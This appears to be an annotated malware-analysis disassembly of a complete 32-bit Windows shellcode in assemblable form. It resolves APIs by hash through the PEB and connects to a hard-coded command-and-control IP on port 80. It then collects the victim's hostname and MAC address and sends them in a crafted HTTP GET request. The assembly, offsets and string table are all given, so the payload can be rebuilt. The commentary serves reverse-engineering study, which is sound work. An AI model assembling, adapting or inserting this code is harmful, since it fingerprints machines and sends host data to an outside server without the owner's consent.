; Input SHA256 : 3A74FBDF96B5E73F930F5887A82E4008FFB8484AE180DD3F7DE7480BC5577345 | |
; Input MD5 : 614D07EF7777CFF5CFDF741587A097DA | |
; Input CRC32 : B326AB6B | |
; --------------------------------------------------------------------------- | |
; File Name : D:\_anal_temp\shellcode2.bin | |
; Format : Binary file | |
; Base Address: 0000h Range: 0000h - 02FCh Loaded length: 02FCh | |
; ---------------------------------------------------------------------------
; Position-independent 32-bit Windows shellcode, 2FCh bytes. Layout:
;   entry (here)   cld; call sub_8F. The call pushes the address of the next
;                  instruction (offset 6 = sub_6); sub_8F pops it into ebp and
;                  uses "call ebp" as "resolve API by hash and call it".
;   sub_6          hash-based API resolver (push args, push hash, call ebp)
;   sub_8F         payload: connect to 5.39.27.226:80 and send one HTTP GET
;   offset 274h+   string table, addressed from sub_8F as [ebp+NNN] (ebp = 6)
; The code writes into its own data area (retry counter, pointer slot, the
; HTTP request is built in place), so it must run from writable memory.
; ---------------------------------------------------------------------------
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
seg000 segment byte public 'CODE' use32
assume cs:seg000
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
        cld                             ; DF = 0: every lodsb/movsb/scasb below walks forward
        call    sub_8F                  ; pushes offset 6 (sub_6) as the return address -> sub_8F pops it into ebp
; =============== S U B R O U T I N E ======================================= | |
; sub_6 — hash-based API resolver (appears to be the Metasploit block_api shape).
;
; Calling convention used by every "call ebp" in sub_8F:
;     push <args...>          ; stdcall order (right to left)
;     push <api_hash>         ; ROR13 hash of module name + ROR13 hash of export name
;     call ebp                ; ebp = address of this routine
; On a match the routine unwinds its own frame, puts the caller's return
; address back on top and tail-jumps into the API, so the API's own stdcall
; return lands in the caller with eax = API result and the arguments removed.
;
; Hash: edi = 0; for each byte b: edi = ror(edi, 13) + b.
;   module part: every byte of the UTF-16 DllName buffer, MaximumLength bytes
;                (zero high bytes included), bytes 61h..7Fh folded to upper case
;   export part: the ASCII export name, up to and including its NUL
; The *_hash symbols pushed in sub_8F are the precomputed sums.
;
; NOTE(review): there is no "not found" exit. If no loaded module exports a
; matching name the walk keeps following Flink around the circular module
; list, eventually treating the list head as a module entry.
;
; Frame after pusha: ebp = esp; saved regs at ebp+0 (edi) .. ebp+1Ch (eax);
; [ebp+20h] = caller's return address; [ebp+24h] = the hash argument.
sub_6 proc near
var_4 = dword ptr -4
        pusha
        mov     ebp, esp
        xor     edx, edx
        mov     edx, fs:[edx+30h]               ; edx = PEB (TEB.ProcessEnvironmentBlock)
        mov     edx, [edx+0Ch]                  ; edx = PEB.Ldr
        mov     edx, [edx+14h]                  ; edx = InMemoryOrderModuleList.Flink (first module entry)
loc_15:                                         ; CODE XREF: sub_6+87j  -- per module
        mov     esi, [edx+28h]                  ; esi = BaseDllName.Buffer (UTF-16)
        movzx   ecx, word ptr [edx+26h]         ; ecx = BaseDllName.MaximumLength, in bytes
        xor     edi, edi                        ; edi = running module-name hash
loc_1E:                                         ; CODE XREF: sub_6+26j  -- per byte of the name buffer
        xor     eax, eax
        lodsb
        cmp     al, 61h ; 'a'
        jl      short loc_27                    ; signed compare: bytes >= 80h are left as-is too
        sub     al, 20h ; ' '                   ; fold to upper case
loc_27:                                         ; CODE XREF: sub_6+1Dj
        ror     edi, 0Dh
        add     edi, eax
        loop    loc_1E
        push    edx                             ; [ebp-4] = current module list entry
        push    edi                             ; [ebp-8] = module-name hash
        mov     edx, [edx+10h]                  ; edx = DllBase (image base of this module)
        mov     eax, [edx+3Ch]                  ; e_lfanew
        add     eax, edx
        mov     eax, [eax+78h]                  ; DataDirectory[EXPORT].VirtualAddress
        test    eax, eax
        jz      short loc_89                    ; no export table -> next module
        add     eax, edx                        ; eax = IMAGE_EXPORT_DIRECTORY*
        push    eax                             ; kept for the ordinal/address lookup below
        mov     ecx, [eax+18h]                  ; NumberOfNames
        mov     ebx, [eax+20h]                  ; AddressOfNames (RVA)
        add     ebx, edx
loc_4A:                                         ; CODE XREF: sub_6+60j  -- names scanned from last to first
        jecxz   short loc_88                    ; no names left -> next module
        dec     ecx
        mov     esi, [ebx+ecx*4]
        add     esi, edx                        ; esi = export name (ASCII, NUL-terminated)
        xor     edi, edi                        ; edi = running export-name hash
loc_54:                                         ; CODE XREF: sub_6+58j
        xor     eax, eax
        lodsb
        ror     edi, 0Dh
        add     edi, eax
        cmp     al, ah                          ; ah == 0 -> stop once the NUL has been hashed
        jnz     short loc_54
        add     edi, [ebp-8]                    ; edi = module hash + export hash
        cmp     edi, [ebp+24h]                  ; equal to the hash the caller pushed?
        jnz     short loc_4A
        pop     eax                             ; eax = export directory
        mov     ebx, [eax+24h]                  ; AddressOfNameOrdinals
        add     ebx, edx
        mov     cx, [ebx+ecx*2]                 ; cx = ordinal of the matched name
        mov     ebx, [eax+1Ch]                  ; AddressOfFunctions
        add     ebx, edx
        mov     eax, [ebx+ecx*4]
        add     eax, edx                        ; eax = resolved function address
        mov     [esp+28h+var_4], eax            ; = [ebp+1Ch], the saved eax slot -> popa returns the address in eax
        pop     ebx                             ; drop saved module hash
        pop     ebx                             ; drop saved list entry
        popa                                    ; eax = function address, other registers restored
        pop     ecx                             ; ecx = caller's return address
        pop     edx                             ; drop the hash argument
        push    ecx                             ; return address back on top
        jmp     eax                             ; tail-call the API; its ret goes straight to the caller
; ---------------------------------------------------------------------------
loc_88:                                         ; CODE XREF: sub_6:loc_4Aj
        pop     eax                             ; drop export directory
loc_89:                                         ; CODE XREF: sub_6+37j
        pop     edi
        pop     edx
        mov     edx, [edx]                      ; Flink -> next module entry (circular list, no end check)
        jmp     short loc_15
sub_6 endp ; sp-analysis failed
; =============== S U B R O U T I N E ======================================= | |
; Attributes: noreturn | |
; sub_8F — the payload. Runs once, then ends the current thread (RtlExitUserThread).
;
; On entry the top of stack is the address pushed by "call sub_8F", i.e. sub_6.
; It is popped into ebp, so "call ebp" = resolve-and-call an API by hash, and
; [ebp+NNN] addresses the string table at the end of the blob (ebp = 6).
;
; What it does (all visible below):
;   1. LoadLibraryA("ws2_32"), LoadLibraryA("IPHLPAPI"); exits the thread on failure.
;   2. WSAStartup, then WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0).
;   3. connect() to the hard-coded C2 5.39.27.226:80 (sockaddr_in built on the
;      stack). Retried while the counter byte at [ebp+248h] (offset 24Eh, the
;      "3" in the data after get_str_len) is non-zero; when it hits zero the
;      code falls through and carries on with an unconnected socket.
;   4. Fingerprint: gethostname() (capped at 32 bytes), the host's own IPv4
;      address via gethostbyname(), and the MAC of that address via
;      SendARP(ip, ip, ...), hex-encoded as 12 upper-case digits.
;   5. Builds, in place over the string table at [ebp+2A7h],
;        "GET /0a821a80/05dc0212 HTTP/1.1\r\nHost: <host>\r\nCookie: MC=<mac>"
;        "\r\nAccept-Encoding: gzip\r\n\r\n"
;      and send()s it once. Nothing is received. Socket closed, thread exits.
;
; Review notes:
;   - The request is assembled inside the shellcode's own trailing data. Only
;     38 zero bytes follow the "Host: " NUL (2D4h..2F9h; the blob ends at
;     2FCh), but up to 32+13+12 bytes plus the 4Fh bytes appended by mem_copy
;     are written there: the build overruns the end of the blob by at least
;     65 bytes and relies on writable slack after the shellcode.
;   - The retry counter and the pointer slot at [ebp+244h] are also written in
;     place; the code must be in writable memory.
;   - The hostname, SendARP and hex buffers are read after esp has been moved
;     back above them. This works only because nothing else is pushed in
;     between (for the hostname, because the push/call that follow land in
;     the unused top 8 bytes of the 256-byte buffer).
;   - SendARP's return value is tested but the flags are clobbered by the
;     following add esp before any branch; only the returned length is checked.
sub_8F proc near ; CODE XREF: seg000:00000001p
        pop     ebp                             ; ebp = address of sub_6 (pushed by "call sub_8F")
        lea     eax, [ebp+297h]                 ; "ws2_32" (offset 29Dh)
        push    eax
        push    kernel32_LoadLibraryA_hash
        call    ebp                             ; LoadLibraryA("ws2_32")
        test    eax, eax
        jz      loc_22B                         ; failed -> exit thread (no socket yet)
        lea     eax, [ebp+29Eh]                 ; "IPHLPAPI" (offset 2A4h), home of SendARP
        push    eax
        push    kernel32_LoadLibraryA_hash
        call    ebp                             ; LoadLibraryA("IPHLPAPI")
        test    eax, eax
        jz      loc_22B
        mov     ebx, 190h
        sub     esp, ebx                        ; 190h-byte WSADATA on the stack
        push    esp                             ; lpWSAData
        push    ebx                             ; wVersionRequested: the same 190h constant reused
        push    ws2_32_WSAStartup_hash
        call    ebp                             ; WSAStartup(190h, &wsadata)
        add     esp, ebx                        ; release WSADATA
        test    eax, eax
        jnz     loc_22B                         ; non-zero = error -> exit thread
        push    eax                             ; dwFlags        = 0
        push    eax                             ; g              = 0
        push    eax                             ; lpProtocolInfo = 0
        push    eax                             ; protocol       = 0
        inc     eax
        push    eax                             ; type = 1 (SOCK_STREAM)
        inc     eax
        push    eax                             ; af   = 2 (AF_INET)
        push    ws2_32_WSASocketA_hash
        call    ebp                             ; WSASocketA(2, 1, 0, 0, 0, 0)
        xor     ebx, ebx
        not     ebx                             ; ebx = -1 = INVALID_SOCKET
        cmp     ebx, eax
        jz      loc_22B                         ; no socket -> exit thread (closesocket skipped)
        mov     ebx, eax                        ; ebx = the socket for the rest of the routine
loc_F3:                                         ; CODE XREF: sub_8F+8Bj  -- connect retry loop
        push    0E21B2705h                      ; sin_addr: bytes 05 27 1B E2 = 5.39.27.226
        push    small 5000h                     ; sin_port = 80 in network byte order
        xor     ecx, ecx
        add     cl, 2
        push    cx                              ; sin_family = AF_INET -> 8-byte sockaddr_in on the stack
        mov     edx, esp                        ; edx = &sockaddr_in
        push    10h                             ; namelen = 16
        push    edx
        push    ebx
        push    ws2_32_connect_hash
        call    ebp                             ; connect(s, &sa, 16)
        test    eax, eax
        jz      short loc_11C                   ; 0 = connected
        dec     byte ptr [ebp+248h]             ; retry counter byte at offset 24Eh (initial 3), decremented in place
        jnz     short loc_F3                    ; each retry leaves its 8-byte sockaddr on the stack
                                                ; counter reached 0 -> fall through, socket not connected
loc_11C:                                        ; CODE XREF: sub_8F+83j
        mov     eax, 100h
        sub     esp, eax                        ; 256-byte hostname buffer
        mov     edx, esp
        push    edx                             ; extra copy of the buffer pointer; survives the API's stdcall cleanup
        push    eax                             ; namelen = 256
        push    edx                             ; name
        push    ws2_32_gethostname_hash
        call    ebp                             ; gethostname(buf, 256)
        pop     edi                             ; edi = hostname buffer
        add     esp, 100h                       ; buffer released; edi still points into it
        test    eax, eax
        jnz     loc_234                         ; SOCKET_ERROR -> close socket, exit thread
        push    edi                             ; written into buffer[0FCh..0FFh], unused for names shorter than 248 bytes
        call    get_str_len                     ; ecx = strlen(hostname)
        pop     esi                             ; esi = hostname
        mov     edx, ecx                        ; edx = hostname length
        lea     edi, [ebp+2A7h]                 ; request template "GET /0a821a80/05dc0212 HTTP/1.1\r\nHost: " (offset 2ADh)
        call    get_str_len                     ; edi = one past the template's NUL
        dec     edi                             ; edi = the NUL after "Host: " -> append point
        cmp     edx, 20h ; ' '
        jl      short loc_15D
        mov     edx, 20h ; ' '                  ; cap the hostname at 32 bytes
loc_15D:                                        ; CODE XREF: sub_8F+C7j
        mov     ecx, edx
        push    esi                             ; keep the hostname pointer across the copies
        rep movsb                               ; append min(len, 32) bytes of hostname, no terminator
        mov     ecx, 0Dh
        lea     esi, [ebp+28Ah]                 ; "\r\nCookie: MC=" (13 bytes, offset 290h)
        rep movsb
        mov     [ebp+244h], edi                 ; save the append point in the dword at offset 24Ah (pad bytes after get_str_len)
        pop     esi
        push    esi
        push    ws2_32_gethostbyname_hash       ; resolve our own hostname to a hostent*
        call    ebp                             ; gethostbyname(hostname)
        test    eax, eax
        jz      loc_234                         ; lookup failed -> close, exit
        mov     cx, [eax+0Ah]                   ; hostent.h_length
        cmp     cx, 4
        jb      loc_234                         ; need at least an IPv4-sized address
        lea     eax, [eax+0Ch]                  ; &hostent.h_addr_list
        mov     eax, [eax]                      ; h_addr_list
        mov     ecx, [eax]                      ; h_addr_list[0]
        mov     ecx, [ecx]                      ; ecx = first IPv4 address (our own)
        mov     eax, 100h
        push    eax                             ; ULONG PhyAddrLen = 100h
        mov     edi, esp                        ; edi = &PhyAddrLen
        sub     esp, eax                        ; 256-byte buffer for the MAC
        mov     esi, esp                        ; esi = MAC buffer
        push    edi                             ; PULONG PhyAddrLen
        push    esi                             ; PULONG pMacAddr
        push    ecx                             ; SrcIP  = own IP
        push    ecx                             ; DestIP = own IP -> MAC of our own adapter
        push    IPHLPAPI_SendARP_hash
        call    ebp                             ; SendARP(ip, ip, mac, &len)
        test    eax, eax                        ; NOTE(review): result unused; flags are overwritten by the add below
        add     esp, 104h                       ; release buffer + length; edi/esi still point at them
        movzx   ecx, word ptr [edi]             ; ecx = returned address length (low word)
        cmp     ecx, 6
        jb      short loc_234                   ; shorter than a MAC -> close, exit
        mov     ecx, 6                          ; encode exactly 6 bytes
        mov     eax, 10h
        sub     esp, eax                        ; 16-byte hex output buffer
        mov     edi, esp                        ; edi = hex output
        mov     edx, ecx
        shl     edx, 1                          ; edx = 12 = hex string length
        push    eax                             ; save 10h (buffer size)
        push    edx                             ; save 12
loc_1D8:                                        ; CODE XREF: sub_8F+173j  -- per MAC byte
        xor     edx, edx
        mov     dl, [esi]
        mov     al, dl
        and     al, 0F0h
        shr     al, 4                           ; high nibble
        cmp     al, 9
        ja      short loc_1EB
        add     al, 30h ; '0'
        jmp     short loc_1ED
; ---------------------------------------------------------------------------
loc_1EB:                                        ; CODE XREF: sub_8F+156j
        add     al, 37h ; '7'                   ; 0Ah..0Fh -> 'A'..'F'
loc_1ED:                                        ; CODE XREF: sub_8F+15Aj
        mov     [edi], al
        inc     edi
        mov     al, dl
        and     al, 0Fh                         ; low nibble
        cmp     al, 9
        ja      short loc_1FC
        add     al, 30h ; '0'
        jmp     short loc_1FE
; ---------------------------------------------------------------------------
loc_1FC:                                        ; CODE XREF: sub_8F+167j
        add     al, 37h ; '7'
loc_1FE:                                        ; CODE XREF: sub_8F+16Bj
        mov     [edi], al
        inc     edi
        inc     esi
        loop    loc_1D8
        pop     ecx                             ; ecx = 12
        sub     edi, ecx                        ; edi = start of the hex string
        mov     esi, edi                        ; esi = hex string (copy source)
        pop     eax                             ; eax = 10h
        add     esp, eax                        ; release hex buffer; still read via esi below
        mov     edi, [ebp+244h]                 ; edi = append point saved after "Cookie: MC="
        rep movsb                               ; append the 12 hex digits
        call    mem_copy                        ; append 4Fh bytes from "\r\nAccept-Encoding: gzip\r\n\r\n"; ecx = request length, edi = one past its NUL
        xor     eax, eax
        push    eax                             ; flags = 0
        push    ecx                             ; len
        sub     edi, ecx
        dec     edi                             ; edi = start of the request
        push    edi                             ; buf
        push    ebx                             ; s
        push    ws2_32_send_hash
        call    ebp                             ; send(s, request, len, 0); return value ignored, nothing is read back
        jmp     short loc_234
; ---------------------------------------------------------------------------
loc_22B:                                        ; CODE XREF: sub_8F+11j sub_8F+27j ...  -- exit, no socket to close
        push    0
        push    ntdll_RtlExitUserThread_hash
        call    ebp                             ; RtlExitUserThread(0): ends this thread, not the process
loc_234:                                        ; CODE XREF: sub_8F+A9j sub_8F+F1j ...  -- exit with an open socket
        push    ebx
        push    ws2_32_closesocket_hash
        call    ebp                             ; closesocket(s)
        jmp     short loc_22B
sub_8F endp
; =============== S U B R O U T I N E ======================================= | |
; get_str_len — strlen.
;   In:   edi = NUL-terminated string; DF = 0 (set by the cld at entry)
;   Out:  ecx = length excluding the NUL; edi = one byte past the NUL; eax = 0
;   Clobbers flags. Unbounded: without a NUL the scan runs until it faults.
get_str_len proc near ; CODE XREF: sub_8F+B0p sub_8F+BEp ...
        xor     ecx, ecx
        not     ecx                             ; ecx = -1: no count limit
        xor     eax, eax                        ; scan for 0
        repne scasb                             ; stops after consuming the NUL
        not     ecx                             ; ecx = bytes consumed, NUL included
        dec     ecx                             ; ecx = length without the NUL
        retn
get_str_len endp
; --------------------------------------------------------------------------- | |
; In-place scratch inside the code blob (hence the need for writable memory):
;   offset 24Ah, dword (the two align pad bytes + two zero bytes) = [ebp+244h]:
;       sub_8F stores the request append point here
;   offset 24Eh, byte, initial value 3                           = [ebp+248h]:
;       connect() retry counter, decremented in place by sub_8F
align 4
db 2 dup(0), 3
; =============== S U B R O U T I N E ======================================= | |
; mem_copy — appends the trailer to the in-place HTTP request and measures it.
;   In:   ebp = 6, so [ebp+2A7h] = request at offset 2ADh, [ebp+26Eh] = offset 274h
;   Out:  ecx = request length up to the first NUL; edi = one past that NUL;
;         eax = 0; esi = source pointer advanced by 4Fh bytes
;   Copies 4Fh (79) bytes starting at aAcceptEncoding onto the end of the request.
;   Only the first 27 ("\r\nAccept-Encoding: gzip\r\n\r\n") plus their NUL matter;
;   the other 51 are simply what follows in the string table
;   ("\r\nCookie: MC=ws2_32\0IPHLPAPI\0GET /0a821a80/05dc0212"). They land after
;   the NUL, so send() never transmits them, but they do extend the in-place
;   write further past the end of the 2FCh-byte blob.
mem_copy proc near ; CODE XREF: sub_8F+185p
        lea     edi, [ebp+2A7h]                 ; request buffer (template + host + cookie already appended)
        call    get_str_len                     ; edi = one past the current NUL
        dec     edi                             ; edi = the NUL -> append here
        mov     ecx, 4Fh ; 'O'                  ; 79 bytes: longer than the 28-byte trailer string
        lea     esi, [ebp+26Eh]                 ; "\r\nAccept-Encoding: gzip\r\n\r\n" (offset 274h)
        rep movsb
        lea     edi, [ebp+2A7h]
        call    get_str_len                     ; ecx = final request length
        retn
mem_copy endp
; --------------------------------------------------------------------------- | |
; String table, referenced from sub_8F as [ebp+NNN] with ebp = 6 (offset = NNN + 6).
; The HTTP request is built in place starting at the NUL after "Host: " (offset
; 2D4h). The zero padding below is the only slack and is smaller than what gets
; appended (see sub_8F / mem_copy), so the build runs past offset 2FCh.
aAcceptEncoding db 0Dh,0Ah                      ; offset 274h = [ebp+26Eh]: trailer copied by mem_copy
                db 'Accept-Encoding: gzip',0Dh,0Ah
                db 0Dh,0Ah,0                    ; blank line ends the request; this NUL bounds the sent length
                db 0Dh                          ; offset 290h = [ebp+28Ah]: "\r\nCookie: MC=" (13 bytes) appended after the hostname
                db 0Ah
aCookie         db 'Cookie: '
aMc             db 'MC='                        ; value = MAC address as 12 upper-case hex digits
aWs2_32         db 'ws2_32'                     ; offset 29Dh = [ebp+297h]: LoadLibraryA argument
                db 0
aIphlpapi       db 'IPHLPAPI',0                 ; offset 2A4h = [ebp+29Eh]: LoadLibraryA argument (for SendARP)
aGet0a821a8005d db 'GET /0a821a80/05dc0212 HTTP/1.1',0Dh,0Ah ; offset 2ADh = [ebp+2A7h]: request template, modified in place
                db 'Host: ',0                   ; offset 2D4h: the hostname (<= 32 bytes) is written over this NUL and onward
                align 4                         ; 2D5h..2F9h are zero: 38 bytes of slack including the NUL above
                dd 8 dup(0)
                dd 41900000h                    ; offset 2F8h; no visible instruction reads it, and a completed request build overwrites it
seg000 ends
end